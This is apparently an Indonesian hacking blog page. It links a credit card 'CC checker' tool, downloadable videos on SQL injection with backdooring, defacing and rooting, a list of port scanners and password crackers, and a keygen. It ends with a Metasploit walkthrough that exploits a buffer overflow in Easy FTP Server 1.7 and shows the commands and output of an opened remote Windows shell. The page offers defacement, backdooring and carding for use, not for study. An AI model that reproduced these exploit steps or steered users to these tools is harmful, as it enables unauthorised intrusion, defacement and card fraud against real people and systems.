'Giez' Special CChecker

Software Checking CC CCChecker
Read More

Video Hacking

Hacking Video Tutorial - Phpmyadmin
http://www.4shared.com/file/pz7Ozrjr/phpmyadmin.html
---------------------------------------------------------------------
---------------------------------------------------------------------
Hacking Video Tutorial - Cpanel Hacking
http://www.4shared.com/file/G3pXG06c/C_p4nel.html
---------------------------------------------------------------------
---------------------------------------------------------------------
Hacking Video Tutorial - Brute Force
http://www.4shared.com/file/NT-NDbjs/tut...Force.html
---------------------------------------------------------------------
---------------------------------------------------------------------
Hacking Video Tutorial - Joomla Reset Password
http://www.4shared.com/file/MIecxKVa/joo..._pass.html
---------------------------------------------------------------------
---------------------------------------------------------------------
Hacking Video Tutorial - RFI Metode + Patch
http://www.4shared.com/file/Ov_3yd9W/RFI_Patc.html
---------------------------------------------------------------------
---------------------------------------------------------------------
Hacking Video Tutorial - LFI (Local file disclosure)
http://www.4shared.com/file/jSmkcNrR/L_F_I.html
---------------------------------------------------------------------
---------------------------------------------------------------------
Hacking Video Tutorial - Sqli + Backdoring
http://www.4shared.com/file/8mmHwxxW/SQLi_B4CKd0r.html
---------------------------------------------------------------------
---------------------------------------------------------------------
Hacking Video Tutorial - Deface with HTML
http://www.4shared.com/file/hkxQik5C/Def...Injec.html
---------------------------------------------------------------------
---------------------------------------------------------------------
Hacking Video Tutorial - Sqli V.4
http://www.4shared.com/file/IBQ-RZU1/S-v4.html
---------------------------------------------------------------------
---------------------------------------------------------------------
Hacking Video Tutorial - Sqli V.5
http://www.4shared.com/document/K4_kSuXf...ction.html
---------------------------------------------------------------------
---------------------------------------------------------------------
Hacking Video Tutorial - Jumping
http://www.4shared.com/file/Agmx67u5/JumP_N4ck0.html
---------------------------------------------------------------------
---------------------------------------------------------------------
Hacking Video Tutorial - Metasploit
http://www.4shared.com/file/fx87EhEY/tutor_metas.html
---------------------------------------------------------------------
---------------------------------------------------------------------
Hacking Video Tutorial - Rooting
http://www.4shared.com/file/Z7YF5ahj/R00tin9.html
---------------------------------------------------------------------
---------------------------------------------------------------------
Hacking Video Tutorial - Asp Sql inj_TUTOR
http://www.4shared.com/file/X60x9df6/asp...TUTOR.html
---------------------------------------------------------------------
---------------------------------------------------------------------
Hacking Video Tutorial - Scemafuzzy
http://www.4shared.com/file/FDOJKC3d/Scema.html
---------------------------------------------------------------------
---------------------------------------------------------------------
Hacking Video Tutorial - Backdoring + Inject + Deface
http://www.4shared.com/file/QMSTE8zc/_2_...ctDef.html
---------------------------------------------------------------------
---------------------------------------------------------------------
Hacking Video Tutorial - Sqli Malingsial Version
http://www.4shared.com/file/xfy-al-Q/Malingsial.html
---------------------------------------------------------------------
---------------------------------------------------------------------
Hacking Video Tutorial - Patching Joomla
http://www.4shared.com/file/a_GUfnkm/joomla_patch.html
---------------------------------------------------------------------
---------------------------------------------------------------------
Hacking Video Tutorial - Defacing Tutorial
http://www.4shared.com/file/Hu4IxoNG/Defac-Tutor.html
---------------------------------------------------------------------
---------------------------------------------------------------------
Thank To : All indonesian Hacker and Defacer
Read More

Video Tutorial Hack

Read More

Download ISO

Read More

Hacking Tools

Nmap :- This tool developed by Fyodor is one of the best unix and windows based port scanners. This advanced port scanner has a number of useful arguments that gives user a lot of control over the process.

Home:- http://www.insecure.org
Latest Release:- Nmap 5.00
Download:- http://nmap.org/download.html
Superscan :- A Windows-only port scanner, pinger, and resolver
SuperScan is a free Windows-only closed-source TCP/UDP port scanner by Foundstone. It includes a variety of additional networking tools such as ping, traceroute, http head, and whois.

Home:- http://www.foundstone.com
Latest Release:- SuperScan v4.0
Download:- http://www.foundstone.com/us/resources/p...rscan4.htm
Angry IP Scanner :- A fast windows IP scanner and port scanner. Angry IP Scanner can perform basic host discovery and port scans on Windows. Its binary file size is very small compared to other scanners and other pieces of information about the target hosts can be extended with a few plugins.

Home:- http://www.angryziber.com [sourceforge.net]
Latest Release:- IPScan 3.0-beta3
Download:- http://www.angryziber.com/w/Download
Unicornscan :- Unicornscan is an attempt at a User-land Distributed TCP/IP stack for information gathering and correlation. It is intended to provide a researcher a superior interface for introducing a stimulus into and measuring a response from a TCP/IP enabled device or network. Some of its features include asynchronous stateless TCP scanning with all variations of TCP flags, asynchronous stateless TCP banner grabbing, and active/passive remote OS, application, and component identification by analyzing responses.

Home:- http://www.unicornscan.org
Latest Release:- Unicornscan 0.4.7-2
Download:- http://www.unicornscan.org

OS Fingerprinting Tools :-
Nmap :- This tool developed by Fyodor is one of the best unix and windows based active os fingerprinting tool.

Home:- http://www.insecure.org
Latest Release:- Nmap 5.00
Download:- http://nmap.org/download.html
P0f :- A passive OS fingerprinting tool. P0f is able to identify the operating system of a target host simply by examining captured packets even when the device in question is behind an overzealous packet firewall.P0f can detect firewall presence, NAT use, existence of load balancers, and more!

Home:- http://lcamtuf.coredump.cx/p0f.shtml
Latest Release:- p0f v2 (2.0.8)
Download:- http://lcamtuf.coredump.cx/p0f.shtml
Xprobe2 :- Active OS fingerprinting tool. XProbe is a tool for determining the operating system of a remote host. They do this using some of the same techniques as Nmap as well as some of their own ideas. Xprobe has always emphasized the ICMP protocol in its fingerprinting approach.

Home:- http://www.sys-security.com [sourceforge.net]
Latest Release:- Xprobe2 0.3
Download:- http://sourceforge.net/projects/xprobe

Password Crackers :-
Cain and Abel :- The top password recovery tool for Windows. This Windows-only password recovery tool handles an enormous variety of tasks. It can recover passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols.

Home:- http://www.oxid.it
Latest Release:- Cain & Abel v4.9.23
Download:- http://www.oxid.it/cain.html
John the Ripper :- A powerful, flexible, and fast multi-platform password hash cracker. John the Ripper is a fast password cracker, currently available for many flavors of Unix, DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types which are most commonly found on various Unix flavors, as well as Kerberos AFS and Windows NT/2000/XP LM hashes. Several other hash types are added with contributed patches.

Home:-
Latest Release:- John the Ripper 1.7
Download:- http://www.openwall.com/john/
THC Hydra :- A Fast network authentication cracker which support many different services. When you need to brute force crack a remote authentication service, Hydra is often the tool of choice. It can perform rapid dictionary attacks against more then 30 protocols, including telnet, ftp, http, https, smb, several databases, and much more.

Home:- http://www.thc.org
Latest Release:- THC-Hydra v5.4
Download:- http://freeworld.thc.org/thc-hydra
L0phtcrack :- Windows password auditing and recovery application
L0phtCrack, also known as LC5, attempts to crack Windows passwords from hashes which it can obtain (given proper access) from stand-alone Windows NT/2000 workstations, networked servers, primary domain controllers, or Active Directory. In some cases it can sniff the hashes off the wire. It also has numerous methods of generating password guesses (dictionary, brute force, etc).

Home:- Not Available
Latest Release:- L0phtcrack v5.04
Download:- http://download.insecure.org/stf/lc5-setup.exe
Keygen
Pwdump :- Windows password recovery tool.
Pwdump is able to extract NTLM and LanMan hashes from a Windows target, regardless of whether Syskey is enabled. It is also capable of displaying password histories if they are available. It outputs the data in L0phtcrack-compatible form, and can write to an output file.

Home:- http://www.foofus.net/fizzgig/pwdump
Latest Release:- pwdump6 version 1.7.2
Download:- http://swamp.foofus.net/fizzgig/pwdump/downloads.htm
RainbowCrack :- An Innovative Password Hash Cracker.
The RainbowCrack tool is a hash cracker that makes use of a large-scale time-memory trade-off. A traditional brute force cracker tries all possible plaintexts one by one, which can be time consuming for complex passwords. RainbowCrack uses a time-memory trade-off to do all the cracking-time computation in advance and store the results in so-called “rainbow tables”. It does take a long time to precompute the tables but RainbowCrack can be hundreds of times faster than a brute force cracker once the precomputation is finished.

Home:- http://www.antsight.com
Latest Release:- rainbowcrack v1.2
Download:- http://www.antsight.com/zsl/rainbowcrack/
Brutus :- A network brute-force authentication cracker
This Windows-only cracker bangs against network services of remote systems trying to guess passwords by using a dictionary and permutations thereof. It supports HTTP, POP3, FTP, SMB, TELNET, IMAP, NTP, and more.

Home: http://www.hoobie.net
Latest Release:- brutus-aet2
Download: http://www.hoobie.net/brutus/brutus-download.html
Read More

Website hacked in 20 seconds

Hack website with the easiest technique is often used by people in 30 seconds ...
                                                                                                                     Download Here 
Read More

Free Wondershare LiveBoot 2012

Wondershare, one of the developers of popular applications, for a limited time to campaign (giveaway) one of its products, Wondershare LiveBoot 2012 (worth $ 59.95). With this software we can create a bootable CD or bootable USB that includes more than 40 functions (utility) to solve various computer problems.
When computers are problematic and can not boot, either due to a virus, a program conflict or a hardware problem, hard drive or other cause, one solution is to boot (start) the computer from CD or USB to analyze the data or save us. Wondershare LiveBoot 2012 not only include the functionality that's all, but many other functions are included. Some of them are as follows:
Data Recovery, rescue data from hard drive is formatted, deleted data, corrupted hard drive (corrupt) and other Windows Recovery, to overcome the problem with booting windows either because of a virus, blue screen, and other Disk Management, a solution to menanajemen hard drive, such as partition, disk format conversion, resizing (resizing), cloning hard drives / partitions, remove and other safely Password & Key Finder, a facility to reset the password of windows, looking back serial or product key windows / office Move a (secure) data from a computer that can not boot into the other storage media Backup and restore files / folders, partitions or entire hard drive is there and various other functions, please see more about Wondershare LiveBoot 2012
With this software we can create a bootable CD or bootable USB, we just install it and choose to create a CD or USB version. To get a license this promotion, please visit our Promo (giveaway). Furthermore, the contents of the name first, last, email address and comment, then click the "Get it Now". After that wait a while and checks incoming email from Wondershare.
In an email we will get the email name and registration code to install this software. In addition the application also included downloader (size 354 KB, only applications for downloading Wondershare actual LiveBoot 2012, the total size of the program is about 314 MB). Furthermore, we can install it on a computer using a user and a serial that has been obtained. This promotion ends Friday, August 12, 2011 at 17:00 pm (18:00 GMT +8). So make sure if you want to get, sign up before that date.
Once the program is installed, there is only a few menu (LiveBoot wizard), 2 main menu is the facility to create a bootable CD and USB Bootable. It can be followed the instructions and very easy. Moreover in order to include information on how computers can boot from CD and USB stick.
For those who have difficulty downloading the program that sent the email, can directly download the installer in       
liveboot_full823.exe ( ukuran 314 MB untuk Windows 7/Vista/XP baik 32bit maupun 64 bit).        
Read More

X-code Galaxy v1.0


xcode

Perhaps there is remember with X-Code Energy has ever hit in the era in which X-Energy code inserted in the CD and so in 2006.

When this has been present X-code Galaxy 2011 v1.0 which is a continuation of the X-code generation Energy, X-code Galaxy 2011 comes with the media take advantage of features the latest X-code, such as download-download hacking programs.

screenshot:




xcode
xcode
Download : X-code Galaxy – Ultimate Edition – Size 5,68 Mb
Download : X-code Galaxy – Lite Edition – Size 1,44 Mb

by:kurniawan

Read More

Workshop X-code Hat Training – Web hacking

X-code Hat Training Training is a special practice to learn the techniques of hacking and security-based basic white hat.

Brazing: Kurniawan


- Vulnerability, OS, Port scanning (Praktek)
- XSS (Praktek)
- CSRF (Praktek)
- LFI (Praktek)
- RFI (Praktek)
- SQL Injection “primitif” (Praktek) Manual!
- SQL Injection standard (Praktek) Manual!
- BLIND SQL Injection (Praktek) Manual! i love boolean
- Penggunaan tool (no manual)
- PHPMyadmin SQL Injection (Praktek)
- Web Server attack (Praktek)
- PHP Injection (Praktek)
- Bind shell / reverse shell (Praktek)
- Ngeroot linux (Praktek)

The practice of directly to the target machine that is designed to learn the techniques of hacking.

http://hat.xcode.or.id
Read More

Examples of how to get a shell attack on an FTP Server


Security of an application server that we use to get attention, because if we do not notice any further then we conceded a computer hacked by someone else who is not liable to be larger.

FTP Server is a server that uses the File Transfer Protocol (FTP) for file transfers between machines on the network TCP / IP, here there are vulnerabilities in applications Easy FTP Server buffer overflow in version 1.7 for which we can use it by entering input in the form of exploit so the data stored exceeds the capacity of buffer memory. The bottom line with the process then we can incorporate a variety of shellcode to run on the server, eg bind a shell.

Here we can use the Metasploit Framework 3.71 or higher.
_       _
_                   | |     (_)_
____   ____| |_  ____  ___ ____ | | ___  _| |_
|    \ / _  )  _)/ _  |/___)  _ \| |/ _ \| |  _)
| | | ( (/ /| |_( ( | |___ | | | | | |_| | | |__
|_|_|_|\____)\___)_||_(___/| ||_/|_|\___/|_|\___)
|_| =[ metasploit v3.7.1-release [core:3.7 api:1.0]
+ — –=[ 688 exploits - 357 auxiliary - 39 post
+ -- --=[ 217 payloads - 27 encoders - 8 nops
=[ svn r12635 updated 64 days ago (2011.05.16)
Warning: This copy of the Metasploit Framework was last updated 64 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
http://www.metasploit.com/redmine/projects/framework/wiki/Updating
msf exploit(easyftp_cwd_fixret) > use exploit/windows/ftp/easyftp_cwd_fixret
Kita menggunakan exploit easyftp_cwd_fixret
msf exploit(easyftp_cwd_fixret) > set PAYLOAD windows/shell/bind_tcp
Kita memilih payload bind_tcp
PAYLOAD => windows/shell/bind_tcp
msf exploit(easyftp_cwd_fixret) > set RHOST 192.168.1.18
Contoh target kita adalah 192.168.1.18
RHOST => 192.168.1.18
msf exploit(easyftp_cwd_fixret) > exploit
Setelah itu tinggal kita ketik exploit seperti diatas lalu enter
[*] Started bind handler
[*] Prepending fixRet…
[*] Adding the payload…
[*] Overwriting part of the payload with target address…
[*] Sending exploit buffer…
[*] Sending stage (240 bytes) to 192.168.1.18
[*] Command shell session 1 opened (192.168.1.10:2598 -> 192.168.1.18:4444) at 2011-07-19 03:32:43 +0700
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\ftp\easyftpsvr-1.7.0.2>
Binggo, anda mendapatkan shell di server FTP Target.
Oleh : Kurniawan
Read More

News Post